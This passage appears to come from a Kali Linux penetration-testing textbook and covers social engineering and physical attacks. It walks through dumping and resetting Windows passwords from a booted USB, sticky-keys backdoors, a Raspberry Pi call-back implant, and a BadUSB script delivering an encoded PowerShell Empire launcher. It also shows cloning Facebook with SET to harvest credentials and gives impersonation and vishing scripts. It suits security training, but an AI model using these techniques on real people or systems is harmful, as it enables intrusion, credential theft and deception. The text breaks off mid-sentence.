The approach to be used will guide the selection of the exploit. Generally, attackers follow an attack tree methodology when creating a threat model, shown in the following diagram:



The attack tree approach allows the tester to easily visualize the attack options that are available and the alternative options that can be employed if a selected attack is not successful. Once an attack tree has been generated, the next step of the exploit phase is to identify the exploits that may be used to compromise vulnerabilities in the target. In the preceding attack tree, we visualize the objective of obtaining engineering documents, which are crucial for organizations that provide engineering services.

Summary

In this chapter, we focused on multiple vulnerability assessment tools and techniques. We learned how to write our own vulnerability script for Nmap using NSE, and also how to use a tool that can convert the findings from active reconnaissance into a defined action that establishes access for the tester to the target. We also learned how to install the OpenVAS, Nessus, and Nexpose vulnerability scanners on Kali Linux.

Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db (searchsploit), as well as several frameworks that simplify the use and management of exploits.

The next chapter focuses on the most important part of the attacker's kill chain, the exploitation phase. Physical security is one method to gain access to data systems (if you can boot, you've got root!); physical access is also closely tied to social engineering, the art of hacking humans and taking advantage of their trust. This is the part of the attack where the attackers achieve their objective. Typical exploitation activities include horizontal escalation by taking advantage of poor access controls, and vertical escalation by theft of user credentials.

Advanced Social Engineering and Physical Security

Social engineering is the art of extracting information from humans. It is a type of attack that has made great progress in recent years by exploiting behavior, and by finding the weaknesses in given circumstances and conditions. This attack can be effective when a human is tricked into providing physical access to their system. It is the single most successful attack vector used during red teaming exercises, penetration testing, or an actual attack. The success of a social engineering attacks relies on two key factors:

- The knowledge that is gained during the reconnaissance phase. The attacker must know the names and usernames associated with the target; more importantly, the attacker must understand the concerns of the users on the network.
- Understanding how to apply this knowledge to convince potential targets to activate the attack by impersonating, talking to them over the phone, inquiring about them, clicking on a link, or executing a program. In recent years, the following two tactics have been the most successful:
 - If the targeted company has recently finished the year-end appraisal, every employee in the company would be very much focused on receiving their updated salary package from the Human Resources department. Therefore, emails or documents with titles associated with that subject will likely be opened by the targeted individuals.
 - If the targeted company had acquired or merged with another, the type of social engineering attack would be whaling, targeted towards C-level managers and other high profile individuals of both the companies. The main principle behind this type of attack is that more privileges the user has, the more access the attackers gain.

Kali Linux provides several tools and frameworks that have an increased chance of success if social engineering is used as a pretext to influence victims to open files or execute certain operations. The examples include file-based executables created by the Metasploit framework and using file-less techniques such as PowerShell scripts using Empire. In this chapter, we'll focus on the **Social Engineering Toolkit** (**SEToolkit**) and Gophish. The techniques used in employing these tools will serve as the model for using social engineering to deploy attacks from other tools.

By the end of this chapter, you will have learned the following:

- Different social engineering attack methods that can be engaged by attackers
- How to perform physical attacks at the console
- How to create rogue physical devices using microcontrollers and USBs
- How to harvest or collect usernames and passwords using the credential harvester attack
- How to launch the tabnabbing and webjacking attacks
- How to employ the multiattack web method
- How to use PowerShell's alphanumeric shellcode injection attack
- How to set up Gophish on Kali Linux
- How to launch an email phishing campaign

To support SET's social engineering attacks, the following general implementation practices will be described:

- Hiding malicious executables and obfuscating the attacker's URL
- Escalating an attack using DNS redirection
- Gaining access to the system and network through USB

Methodology and attack methods

As an attack route supporting the kill chain methodology, social engineering focuses on the different aspects of an attack that take advantage of a person's trust and innate helpfulness to deceive and manipulate them into compromising a network and its resources. The following diagram depicts the different types of attack methods that attackers can engage in to harvest information:


From the last edition, we have now reclassified social engineering tactics into two main categories: one that involves technology and another that includes people-specific techniques.

The following sections will provide a briefing on every type and we will explore computer-based attacks in this chapter, especially physical attacks and email phishing using Kali Linux.

Technology

As the technology has evolved from traditional PCs to laptops, and now to mobile phones, so have social engineering techniques. In this section, we discuss computer-based and mobile-based attacks that can be performed using Kali Linux.

Computer-based

Attacks that utilize computers to perform social engineering are subdivided into the following types. All these types are best utilized only when all passive and active reconnaissance information is utilized to the maximum:

- **Email phishing**: Attacks that utilize the email medium to harvest information or exploit a known software vulnerability in the victim's system are referred to as email phishing.
- **Baiting**: This is a technique that's used to embed a known vulnerability and create a backdoor, to achieve the objective by utilizing USB sticks and compact disks. Baiting focuses more on exploiting the human curiosity factor through the use of physical media. Attackers can create a Trojan that will provide backdoor access to the system either by utilizing the autorun feature, or when a user clicks to open the files inside the drive.
- **Wi-Fi phishing**: Penetration testers can utilize this technique to harvest usernames and passwords by setting up a fake Wi-Fi network, similar to the targeted company. For example, the attackers could target XYZ company by setting the SSID in their Wi-Fi exactly the same as or similar to the company's and then allow the users to connect without any password to the fake wireless router.

Mobile-based

- **SMSishing**: Attackers perform phishing using **Short Message Service** (**SMS**) by sending links to click or drafting a message that makes the user reply to the text. Penetration testers can also utilize publicly offered services such as https://www.spoofmytextmessage.com/free.
- **Quick Response Code (QR code):** During a red team exercise, QR codes are also the most effective way to deliver a payload to an isolated area. Similar to spamming, QR codes can be printed and posted in places where most people visit, for example cafeterias, smoking zones, toilets, and other relevant areas.

People-based

People-based attacks are the most effective attacks during a red team or penetration test. These attacks are focused on the behavior of people in a given situation. The following sections explain the different types of attack that can be performed by focusing on people's weaknesses and different tactics.

Physical attacks

Physical attacks typically involve the physical existence of an attacker, who then performs a social engineering attack. The following are the two types of physical attack that are engaged during RTE or penetration testing:

- Impersonation: This involves the testers creating a script and impersonating an important person in order to harvest information from a targeted set of staff. We recently performed a social engineering attack with the goal of identifying the username and password of a domain user through a physical social engineering exercise. The scenario involves an attacker talking to the victim and impersonating the internal IT helpdesk, "Dear Xman, I am Doctor X from the internal IT department. It has been noted that your system has been disconnected from the network for a period of 20 days. It is recommended to install the latest system updates due to the latest ransomware attack. Do you mind providing the laptop along with your username and password?" That resulted in the user providing the login details and as bonus passing on the laptop to the attacker. Now, the attacker's next move is to plant a backdoor into the system to maintain persistent access.
- Attacks at the console: These involve all attacks that involve physical access to the system, such as changing the password of an administrator user, planting a keylogger, extracting stored browser passwords, or the installation of backdoor.

Voice-based

Any attack that involves a voice message and tricks the user into performing an action on the computer or leaking sensitive information is referred to as voice-based social engineering.

Vishing is the art of utilizing a recorded voice message or an individual calling the victim to extract information from a targeted victim or group of victims. Typically, Vishing involves a trustable script, for example, if company X announces a new joint venture with company Y, the staff will be curious about the future of both companies. This allows the attackers to call the victim directly with a pre-defined script as follows:

"Hello, I am XX calling from Company Y, we have now been announced as a joint venture, so technically we are all the same team. Having said that, can you please let me know where your data centers are located and do provide me with list of mission-critical servers. If you are not the right person, can you point me to the right one. Many thanks, XX".

Physical attacks at the console

In this section, we will explore different types of attack that are typically performed on a system with physical access.

samdump2 and chntpw

One of the most popular ways to dump password hashes is to utilize samdump2. This can be done by turning on the power of the acquired system and then booting it through our Kali USB stick by making the required changes in the BIOS.

1. Once the system is booted through Kali, by default the local hard drive must be mounted as a media drive (assuming the media drive is not encrypted with PGP or similar), as shown in the following screenshot:

oot@kali:~# fdisk -l Disk /dev/sda: 28.7 GiB, 30752000000 bytes, 60062500 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x63fda129 Device Boot Start End Sectors Size Id Type /dev/sda1 64 1669119 1669056 815M 17 Hidden HPFS/NTFS /dev/sda2 1669120 1670527 1408 704K 1 FAT12 Disk /dev/sdb: 238.5 GiB, 256060514304 bytes, 500118192 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x622d859d Size Id Type Device End Boot Sectors Start /dev/sdb1 2048 206847 204800 100M 7 HPFS/NTFS/exFAT 206848 251865087 251658240 /dev/sdb2 120G 7 HPFS/NTFS/exFAT /dev/sdb3 251865088 500115455 248250368 118.4G 7 HPFS/NTFS/exFAT Disk /dev/loop0: 591.2 MiB, 619929600 bytes, 1210800 sectors

- Units: sectors of 1 * 512 = 512 bytes
 - 2. If the drive is not mountable, the attackers can manually mount the drive by running the following commands:

mkdir /mnt/target1 mount /dev/sda2 /mnt/target1

3. Once the system is mounted, navigate to the mounted folder (in our case, it is /media/root/<ID>/Windows/System32/Config), and run samdump2 SYSTEM SAM, as shown in the following screenshot. The SYSTEM and SAM files should display all the users on the system drive and also their password hashes, which will then

be used to crack the password offline using the John the Ripper or credump tools:



Using the same access, attackers can also remove the password of a user from the system. chntpw is a Kali Linux tool that can be used to edit the Windows registry, reset a user's password, and promote a user to administrator, as well as several other useful options. Using chntpw is a great way to reset a Windows password or otherwise gain access to a Windows machine when you don't know what the password is.

chntpw is a utility to view information and change user passwords in Windows NT/2000, XP, Vista, and 7.

4. The SAM user database file is usually located at \windows\system32\config\SAM on the Windows filesystem. Navigate to folder as shown in the following screenshot:

| total 14/625 | |
|--|----|
| drwxrwxrwx 1 root root 49152 Jun 17 15:52 . | |
| drwxrwxrwx 1 root root 655360 Jun 17 15:57 | |
| -rwxrwxrwx 2 root root 28672 Jun 21 2016 BCD-Template | |
| -rwxrwxrwx 2 root root 25600 Jun 21 2016 BCD-Template.LOG | |
| -rwxrwxrwx 2 root root 32768000 Jun 17 15:52 COMPONENTS | |
| -rwxrwxrwx 2 root root 65536 Jun 21 2016 COMPONENTS(016888b9-6c6f-11de-8d) | d |
| 001e0bcde3ec}.TM.blf | |
| -rwxrwxrwx 2 root root 524288 Jun 21 2016 COMPONENTS(016888b9-6c6f-11de-8d) | d |
| 001e0bcde3ec},TMContainer000000000000000000000000000000000000 | |
| -rwxrwxrwx 2 root root 524288 Jul 14 2009 COMPONENTS/016888b9-6c6f-11de-8d1 | d |
| 001e0bcde3ec1, TMContainer0000000000000000000000002, redtrans-tis | |
| -rwxrwxrwx 2 root root 65536 Sep 29 2016 COMPONENTS(0632cbee-8539-11e6-840 | 04 |
| e4b3181e3fc4).TN.blf | |
| -rwxrwxrwx 2 root root 524288 Sep 29 2016 COMPONENTS(0632cbee-8539-11e6-846 | 14 |
| e4b3181e3fc41_TMContainer000000000000000000000000000000000000 | |
| -rwxrwxrwx 2 root root 524288 Sep 28 2016 COMPONENTS/0632chee-8539-11e6-846 | 14 |
| e4b3181e3fc4} TMContainer0000000000000000002 redtraps-ms | 2 |
| - pwxrwxrwy 2 root root 65536 Jun 17 15-04 COMPONENTS/3fda0370-8617-11e6-8d | 81 |
| e4b3181e3fc41_TM_b1f | |
| - DW DWY DWY 7 CODT CODT 524288 Jun 15 00.43 COMPONENTS/31040370-8617-1106-809 | 21 |
| e4b31B1e3fc4} TMContainer000000000000000000000000000000000000 | |

5. Run chntpw SAM; the password is stored in the SAM file in Windows. **Security Accounts Manager (SAM)** is a database file in Windows XP, Windows Vista, and Windows 7 that stores users' passwords.

It can be used to authenticate local and remote users. Usually, the sam file is located in c/windows/system32/config/SAM:

chntpw -l <sam file>
chntpw -u <user><sam file>

The following screenshot provides the output of the edited SAM file contents:

00000220 = Administrators (which has 4 members) Account bits: 0x0210 = l Disabled [] Homedir req.] Passwd not req. [X] Normal account [] Temp. duplicate [[] NMS account] Domain trust ac [] Wks trust act.] Srv trust act (unknown 0x08) [X] Pwd don't expir | [] Auto lockout [] (unknown 0x20)] (unknown 0x10) (unknown 0x40) Failed login count: 373, while max tries is: 0 Total login count: 46 ** No NT MD4 hash found. This user probably has a BLANK password! ** No LANMAN hash found either. Try login with no password! - - - - User Edit Menu: Clear (blank) user password 2 - Unlock and enable user account [probably locked now] 3 - Promote user (make user an administrator) 4 - Add user to a group 5 - Remove user from a group q - Quit editing user, back to user select Select: [ɑ] > ɑ Hives that have changed: # Name 0 <SAM> Write hive files? (y/n) [n] : y 0 <SAM> - OK oot@kali:/media/root/C45C428A5C4276E8/Windows/System32/config#

Finally, you should be able to get a confirmation like this: <sam> - ok.



In Windows 10, a reboot of the system will contain hyberfile.sys, which will not allow the attackers to mount the system drive. In order to mount the system drive and gain access to the drive, use mount -t ntfs-3g -ro remove_hiberfile /dev/sda2 /mnt/folder. Do note that some systems with rnd point encryption tools may not be able to boot after this file is deleted.

Other bypassing tools include Kon-boot, which is another forensics utility that

utilizes a similar feature to chntpw, but Kon-boot only affects the administrator account and doesn't remove the administrator password; it just lets you log in without a password and on the next normal system reboot, the original administrator's password is in place, intact. This tool can be downloaded from this website: https://www.piotrbania.com/all/kon-boot/.

Sticky keys

In this section, we will explore how to utilize physical access to the console of a Windows computer that is unlocked or without a password. Attackers can exploit the feature of Microsoft Windows sticky keys to plant a backdoor in a fraction of a second; however, the caveat is you will need to have administrator privileges to place the executable. But when the system is booted through Kali Linux, the attackers can place the files without any restrictions.

The following is a list of Windows utilities that can be utilized by attackers to replace utility executables with cmd.exe Or powershell.exe:

- sethc.exe
- utilman.exe
- osk.exe
- narrator.exe
- magnify.exe
- displayswitch.exe

The following photograph shows when an attacker replaces sethc.exe with cmd.exe:



Creating a rogue physical device

Kali also facilitates attacks where the intruder has direct physical access to systems and the network. This can be a risky attack, as the intruder may be spotted by an observant human, or caught on a surveillance device. However, the reward can be significant, because the intruder can compromise specific systems that have valuable data.

Physical access is usually a direct result of social engineering, especially when impersonation is used. Common impersonations include the following:

- A person who claims to be from the help desk or IT support, and just needs to quickly interrupt the victim by installing a system upgrade.
- A vendor who drops by to talk to a client, and then excuses himself to talk to someone else or visit a restroom.
- A delivery person dropping off a package. Attackers can buy a delivery uniform online; however, since most people assume that anyone who is dressed all in brown and pushing a handcart filled with boxes is a UPS delivery person, uniforms are rarely a necessity for social engineering!
- Trades persons wearing work clothes, carrying a work order that they have printed out, are usually allowed access to wiring closets and other areas, especially when they claim to be present at the request of the building manager.

Dress in an expensive suit, carry a clipboard, and walk fast; employees will assume that you're an unknown manager. When conducting this type of penetration, we usually inform people that we are auditors, and our inspections are rarely questioned.

The goal of hostile physical access is to rapidly compromise selected systems; this is usually accomplished by installing a backdoor or similar device on the target.

One of the classic attacks is to place a CD-ROM, DVD, or USB key in a system and let the system install it using the autoplay option; however, many organizations disable autoplay across the network. Attackers can also create poisoned bait traps: mobile devices that contain files with names that invite a person to click on the file and examine its contents. Some of the examples include the following:

- USB keys with labels such as Employee Salaries or Medical Insurance Updates.
- Metasploit allows an attacker to bind a payload, such as a reverse shell, to an executable such as a screensaver. The attacker can create a screensaver using publicly available corporate images, and email CDs to employees with the new endorsed screensaver. When the user installs the program, the backdoor is also installed and it connects to the attacker.
- If you know that employees have attended a recent conference, attackers can impersonate a vendor who was present and send the target a letter insinuating that it is a follow-up from the vendor show. A typical message will be "If you missed our product demonstration and one-year free trial, please review the slideshow on the attached USB key by clicking on start.exe."

One interesting variant is the SanDisk U3 USB key, or Smart Drive. The U3 keys were preinstalled with Launchpad software, which automatically allowed the keys to write files or registry information directly to the host computer when inserted, to assist in the rapid launch of approved programs. The u3-pwn tool (Kali Linux | Applications | Social Engineering Tools | u3-pwn) removes the original ISO file from the SanDisk U3 and replaces it with a hostile Metasploit payload, which is then encoded to avoid detection on the target system. Unfortunately, support for these USB devices is reducing, and they remain vulnerable to the same degree of detection as other Metasploit payloads.

Microcomputer or USB-based attack agents

We have noticed a significant increase in using microcomputers and USB based devices in RTE/penetration testing. These are mainly used due to their compactness, they can be hidden anywhere in the network and also can run almost anything that a full fledged laptop can. In this section, we will explore the most commonly used devices, the Raspberry Pi and Malduino USB.

The Raspberry Pi

The Raspberry Pi is a microcomputer; it measures approximately 8.5 cm x 5.5 cm in size, but manages to pack in 2 GB RAM, two USB ports, and an Ethernet port supported by a Broadcom chip using an ARM processor, running at 700 MHz (which can be overclocked to 1 GHz). It doesn't include a hard drive, but uses an SD card for data storage. As shown in the following photograph, the Raspberry Pi is approximately pocked sized; it is easy to hide on a network (behind workstations or servers, placed inside server cabinets, or hidden beneath floor panels in the data center):



To configure a Raspberry Pi as an attack vector, the following items are required:

- A Raspberry Pi Model B, or newer versions
- An HDMI cable
- A micro USB cable and charging block
- An Ethernet cable or mini-wireless adapter
- An SD card, Class 10, at least 8 GB in size

Together, all these supplies are typically available online for a total of less than \$70.

- To configure the Raspberry Pi, download the latest version of the Kali Linux ARM edition from https://www.offensive-security.com/kali-linux-arm-image s/ and extract it from the source archive. If you are configuring from a Windows-based desktop, then we would utilize the same Win32 Disk Imager that we utilized in chapter 1, Goal-based Penetration Testing, to make a bootable Kali USB stick.
- 2. Using a card reader, connect the SD card to the Windows-based computer and open the Win32 Disk Imager. Select the ARM version of Kali, kalicustom-rpi.img, which was downloaded and extracted previously, and write it to the SD card. Separate instructions for flashing the SD card from Mac or Linux systems are available on the Kali website.
- 3. Insert the newly flashed SD card into the Raspberry Pi and connect the Ethernet cable or wireless adapter to the Windows workstation, the HDMI cable to a monitor, and the Micro USB power cable to a power supply. Once supplied with power, it will boot directly into Kali Linux. The Raspberry Pi relies on external power, and there is no separate on/off switch; however, Kali can still be shut down from the command line. Once Kali is installed, ensure that it is up to date using the apt-get command.
- 4. Make sure the SSH host keys are changed as soon as possible, as all Raspberry Pi images have the same keys. Use the following command:

```
root@kali:~ rm /etc/ssh/ssh_host_*
root@kali:~ dpkg-reconfigure openssh-server
root@kali:~ service ssh restart
```

At the same time, make sure the default username and password are changed.

- 5. The next step is to configure the Raspberry Pi to connect back to the attacker's computer (using a static IP address or using a dynDNS) at regular intervals using a cron job. An attacker must then physically access the target's premises and connect the Raspberry Pi to the network. The majority of networks automatically assign devices a DHCP address and have limited controls against this type of attack.
- 6. Once the Raspberry Pi connects back to the attacker's IP address, the attacker can run reconnaissance and exploit applications against the victim's internal network from a remote location using SSH to issue commands.

If a wireless adapter is connected, such as EW-7811Un, the 150 Mbps wireless 802.11b/g/n Nano USB adapter, the attacker can connect

wirelessly or use the Pi to launch wireless attacks.

The MalDuino – the BadUSB

The MalDuino is an Arduino-powered USB that can be used by attackers during a RTE/penetration testing activity. This device has a keyboard injection capability and runs the commands within fraction of second. These devices are extremely useful during physical security with access to the organization's building. Often, people inside the organization rarely lock their computer, assuming the physical access restrictions are safeguards and no one would do anything. Even if attackers gain access physically to the system, staff can arguably say we have no USB policy, well its good. But disabling USB does not disable USB-based keyboards—when attackers plugs in the MalDuino, it acts as a keyboard, typing commands exactly how a human being would run a specified payload and execute.

There are two flavors of MalDuino, Elite and Lite. The difference is Elite provides an SD card option for you dump around 16 different payloads with the hardware switches on the device, so that you don't need to reconfigure the entire device. With of MalDuino Lite, you have to configure the device everytime you change the payload.

The board supports the Ducky Scripts templates, making it easy to build custom scripts. The following photo depicts the MalDuino Elite hardware:



Instructions on how to set up the board can be found at https://malduino.com/wiki/do
ku.php?id=setup:elite.

We will focus on setting up a PowerShell Empire script for the board by following these steps:

- 1. Generate the PowerShell payload in Empire.
- 2. Ensure the listeners are up and listening for any connections.
- 3. Convert the PowerShell launcher into strings, since MalDuino has a buffer size of 256 bytes, so the payloads must be fragmented. This can be achieved by visiting https://malduino.com/converter/.
- 4. Once the strings are converted, it should look something like the following screenshot:

```
STRING DUMYDUMMYDUMMYAVAByAGkAZABlaG4AdAAvADcALgAwAD:
STRING QBAC4AByAFsAXQBdACQAYgA9ACgAWwBDAGgAQQBSAFsAX(
STRING AUwBFAHIAdgBpAGMAZQBQAG8ASQBuAHQATQBhAG4AQQBn/
STRING ARABFAEYAQQB1WABvAFIAJABLAFsAJABJACsAKwAlACQAS
STRING vADUALgAwACAAKABXAGkAbgBkAG8AdTgBFAHQALgBXAGU/
STRING TgBRADAAPQBQAC4AZABaADIAeABXAFYAMwAkACcAOwAkA(
```

5. The next step is to build the ducky script, as shown in the following screenshot:

```
DELAY 1000
GUI r
DELAY 200
STRING cmd.exe
ENTER
STRING DUMMYDUMMYAGKAZABlaG4AdAAVADcALgAwADsAIAByAHYAOg/
STRING QBAC4AByAFsAXQBdACQAYgA9ACgAWwBDAGgAQQBSAFsAXQBd/
STRING QBAC4AByAFsAXQBdACQAYgA9ACgAWwBDAGgAQQBSAFsAXQBd/
STRING AUwBFAHIAdgBpAGMAZQBQAG8ASQBuAHQATQBhAG4AQQBnAGU/
STRING ARABFAEYAQQB1WABVAFIAJABLAFsAJABJACsAKwAlACQASwAu
STRING VADUALgAwACAAKABXAGkAbgBkAG8AdTgBFAHQALgBXAGUAQgE
ENTER
```

6. The final action is to plug the device into the victim machine; you should now be able to see an agent reporting back, as shown in the following screenshot:

| (Empire: listene | rs/http) > list | eners | | |
|--|--|--|--------------|----------|
| [*] Active liste | ners: | | | |
| Name | Module | Bost | Delay/Jitter | KillDate |
| showhacker | http | http://192.168.0.24:80 | 5/0.0 | |
| (Empire: listene [*] New agent YX [+] Initial agen [*] Sending agen | rs) > [*] Sendi 27C6UT checked it YX27C6UT from it (stage 2) to | ng POHERSHELL stager (stage 1) to in 192.168.0.20 now active (Slack) YX27C6UT at 192.168.0.20 | 192.168.0.20 | |

The Social Engineering Toolkit (SET)

SET was created and written by David Kennedy (ReL1K), and it is maintained by an active group of collaborators (www.social-engineer.org). It is an open source Python-driven framework that is specifically designed to facilitate social engineering attacks.

The tool was designed with the objective of achieving security by training. A significant advantage of SET is its interconnectivity with the Metasploit framework, which provides the payloads needed for exploitation, the encryption to bypass antivirus, and the listener module, which connects to the compromised system when it sends a shell back to the attacker.

To open SET in a Kali distribution, go to Applications| Social Engineering Tools | setoolkit, or enter setoolkit at a shell prompt. You will be presented with the main menu, as shown in the following screenshot:

```
Tt's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
    There is a new version of SET available.
        Your version: 7.7.5
        Current version: 7.7.9
Please update SET to the latest before submitting any git issues.
Select from the menu:
    1) Social-Engineering Attacks
    2) Penetration Testing (Fast-Track)
    3) Third Party Modules
    4) Update the Social-Engineer Toolkit
    5) Update SET configuration
    6) Help, Credits, and About
    99) Exit the Social-Engineer Toolkit
```

If you select 1) Social-Engineering Attacks, you will be presented with the following

submenu:

```
Please update SET to the latest before submitting any git issues.
Select from the menu:

Spear-Phishing Attack Vectors
Website Attack Vectors
Infectious Media Generator
Create a Payload and Listener
Mass Mailer Attack
Arduino-Based Attack Vector
Wireless Access Point Attack Vector
QRCode Generator Attack Vector
SMS Spoofing Attack Vector
SMS Spoofing Attack Vector
Third Party Modules

99) Return back to the main menu.
```

The following is a brief explanation of the social engineering attacks.

spear-Phishing Attack vector allows an attacker to create email messages and send them to targeted victims with attached exploits.

website Attack vectors utilize multiple web-based attacks, including the following:

- Java applet attack method: This spoofs a Java certificate and delivers a Metasploit-based payload. This is one of the most successful attacks, and it is effective against Windows, Linux, and macOS targets.
- **Metasploit browser exploit method**: This delivers a Metasploit payload using an iFrame attack.
- **Credential harvester attack method**: This clones a website and automatically rewrites the POST parameters to allow an attacker to intercept and harvest user credentials; it then redirects the victim back to the original

site when harvesting is completed.

- **Tabnabbing attack method**: This replaces information on an inactive browser tab with a cloned page that links back to the attacker. When the victim logs in, the credentials are sent to the attacker.
- Web jacking attack method: This utilizes iFrame replacements to make the highlighted URL link appear legitimate; however, when it is clicked, a window pops up and is then replaced with a malicious link.
- **Multi-attack web method**: This allows an attacker to select some or all of the several attacks that can be launched at once, including the following:
 - Java applet attack method
 - Metasploit browser exploit method
 - Credential harvester attack method
 - Tabnabbing attack method
 - Man left in the middle attack method
- **Full-screen attack method**: This is a simple attack method utilized by attackers to launch an attack behind the scenes when the system is in full-screen mode.
- **HTA attack method**: This is when an attacker presents a fake website that will automatically download HTML applications in the .HTA format.
- **Infectious media generator**: This creates an autorun.inf file and Metasploit payload. Once burned or copied to a USB device or physical media (CD or DVD) and inserted into the target system, it will trigger autorun (if autorun is enabled) and compromise the system.
- **To create a payload and listener**: This module is a rapid menu-driven method of creating a Metasploit payload. The attacker must use a separate social engineering attack to convince the target to launch it.
- **MassMailer attack**: This allows the attacker to send multiple customized emails to a single email address or a list of recipients.
- Arduino-based attack vector: This programs Arduino-based devices, such as the Teensy. Because these devices register as a USB keyboard when connected to a physical Windows system, they can bypass security based on disabling autorun or other endpoint protection.
- Wireless access point attack vector: This will create a fake wireless access point and DHCP server on the attacker's system and redirect all DNS queries to the attacker. The attacker can then launch various attacks, such as the Java applet attack or a credential harvester attack.

- **QRcode generator attack vector**: This creates a QR code with a defined URL associated with an attack.
- **PowerShell attack vectors:** This allows the attacker to create attacks that rely on PowerShell, a command-line shell and scripting language available on Windows Vista and higher versions.
- **SMS spoofing attack vector**: This allows the attacker to send a crafted SMS text to a person's mobile device and spoof the source of the message. This module has been recently blocked by SET.
- Third-party modules: This allows the attacker to use the **Remote** Administration Tool Tommy Edition (RATTE) as part of a Java applet attack or as an isolated payload. RATTE is a text menu-driven remote access tool.

SEToolkit also provides a menu item for fast-track penetration testing, which gives rapid access to some specialized tools that support brute-force identification and password cracking of SQL databases, as well as some customized exploits that are based on Python, SCCM attack vectors, Dell computer DRAC/chassis exploitation, user enumeration, and PsExec PowerShell injection.

The menu also gives options for updating the Metasploit framework, SET, and the SET configuration. However, these additional options should be avoided as they are not fully supported by Kali, and may cause conflicts with dependencies.

As an initial example of SET's strengths, we'll see how it can be used to gain a remote shell: a connection made from the compromised system back to the attacker's system.

Using a website attack vector – the credential harvester attack method

Credentials, generally the username and password, give a person access to networks, computing systems, and data. An attacker can use this information indirectly (by logging on to the victim's Gmail account and sending emails to facilitate an attack against the victim's trusted connections), or directly against the user's account.

This attack is particularly relevant given the extensive reuse of credentials; users typically reuse passwords in multiple places.

Particularly prized are the credentials of a person with privileged access, such as a system administrator or a database administrator, which can give an attacker access to multiple accounts and data repositories.

The SET's credential harvesting attack uses a cloned site to collect credentials.

To launch this attack, select website Attack Vectors from the main menu, then select credential Harvester Attack Method, and then select site cloner. For this example, we will follow the menu selections to clone a website, such as Facebook, as shown in the following screenshot:

| 1) Web Templates | |
|--|------------|
| 2) Site Cloner | |
| 3) Custom Import | |
| 99) Return to Webattack Menu | |
| set:webattack>2 | |
| [-] Credential harvester will allow you to utilize the clone capabilities within | SET |
| [-] to harvest credentials or parameters from a website as well as place them int | o a report |
| [-] This option is used for what IP the server will POST to. | |
| [-] If you're using an external IP, use your external IP for this | |
| set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.24 | 1: |
| [-] SET supports both HTTP and HTTPS | |
| [-] Example: http://www.thisisafakesite.com | |
| <pre>set:webattack> Enter the url to clone:https://facebook.com/login.php</pre> | |
| [*] Cloning the website: https://login.facebook.com/login.php | |
| [*] This could take a little bit | |
| The best way to use this attack is if username and password form | |
| fields are available. Regardless, this captures all POSTs on a website. | |
| [*] The Social-Engineer Toolkit Credential Harvester Attack | |
| [*] Credential Harvester is running on port 80 | |
| [*] Information will be displayed to you as it arrives below: | |

Again, the attacker's IP address must be sent to the intended target. When the target clicks on the link or enters the IP address, they will be presented with a cloned page that resembles the regular entry page for Facebook, as shown in the following screenshot, and they will be prompted to enter their usernames and passwords:

| 🙀 Log in to Facebook Fac 🔹 | |
|---|--|
| C () Not seare 192.168.0.24 | |
| To help personalise content, tails infor | or and measure ack and provide a safer experience, we use cookies. By clicking on or navigating the site, you multion on and off Facebook through cookies. Learn more, including about available controls: <u>Cookie Policy</u> . |
| facebook 🗖 | ge Up |
| | |
| | |
| | Log in to Facebook |
| | Frend addresse by primers manched |
| | Passwidend |
| | Log In |
| | Forgatten account? - Sign up for Eacabook |
| | |

Once this is done, the users will be redirected to the regular Facebook site, where they will be logged in to their account.

In the background, their access credentials will be collected and forwarded to the attacker. They will see the following entry in the listener window:

```
PARAM: return session=
POSSIBLE USERNAME FIELD FOUND: skip api login=
PARAM: signed next=
PARAM: trynum=1
PARAM: timezone=0
PARAM: lgndim=eyJ31joxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzI4LCJjIjoyNH0=
PARAM: lgnrnd=080457 PUD1
PARAM: lgnjs=1544285439
POSSIBLE USERNAME FIELD FOUND: email=vijay
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
POSSIBLE PASSWORD FIELD FOUND: pass=SuperSec3rtjasdf123
FOSSIBLE USERNAME FIELD FOUND: login=1
PARAM: prefill contact point=
PARAM: prefill source=
PARAM: prefill type=
PARAM: first prefill source=
PARAM: first prefill type=
FARAM: had cp prefilled=false
  SSIBLE PASSWORD FIELD FOUND: had password prefilled=false
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
```

When the attacker has finished collecting credentials, entering Ctrl + C will generate two reports in the /SET/reports directory in XML and HTML formats.

Note that the address in the URL bar is not the valid address for Facebook; most users will recognize that something is wrong if they can see the address. A successful exploit requires the attacker to prepare the victim with a suitable pretext, or story, to make the victim accept the unusual URL. For example, send an email to a targeted group of non-technical managers to announce that a local Facebook site is now being hosted by IT to reduce delays in the email system.

The credential harvesting attack is an excellent tool for assessing the security of a corporate network. To be effective, the organization must first train all the employees on how to recognize and respond to a phishing attack. Approximately two weeks later, send a corporate-wide email that contains some obvious mistakes (incorrect name of the corporate CEO or an address block that contains the wrong address) and a link to a program that harvests credentials. Calculate the percentage of recipients who responded with their credentials, and then tailor the training program to reduce this percentage.

Using a website attack vector – the tabnabbing attack method

Tabnabbing exploits a user's trust by loading a fake page in one of the open tabs of a browser. By impersonating a page of a site such as Gmail, Facebook, or any other site that *posts* data (usually usernames and passwords), a tabnabbing attack can collect a victim's credentials. SET invokes the credential harvester attack that we previously described.

To launch this attack, launch SET from a console prompt, and then select 1) Social-Engineering Attacks. In the next menu, select 2) Website Attack Vectors. The tabnabbing attack is launched by selecting 4) Tabnabbing Attack Method.

When the attack is launched, you will be prompted with three options to generate the fake websites that will be used to gather credentials. The attacker can allow SET to import a list of predefined web applications, clone a website (such as Gmail), or import their own website. For this example, we will select 2) site cloner.

This will prompt the attacker to enter the IP address that the server will POST to; this is usually the IP address of the attacker's system.

The attacker must then employ social engineering to force the victim to visit the IP address for the post back action (for example, URL shortening). The victim will receive a message that the site is loading (as the attack script loads the cloned site on a different tab in the browser, as shown in the following screenshot):



Please wait while the site loads ...

The target will then be presented with the fake page (with the false IP address

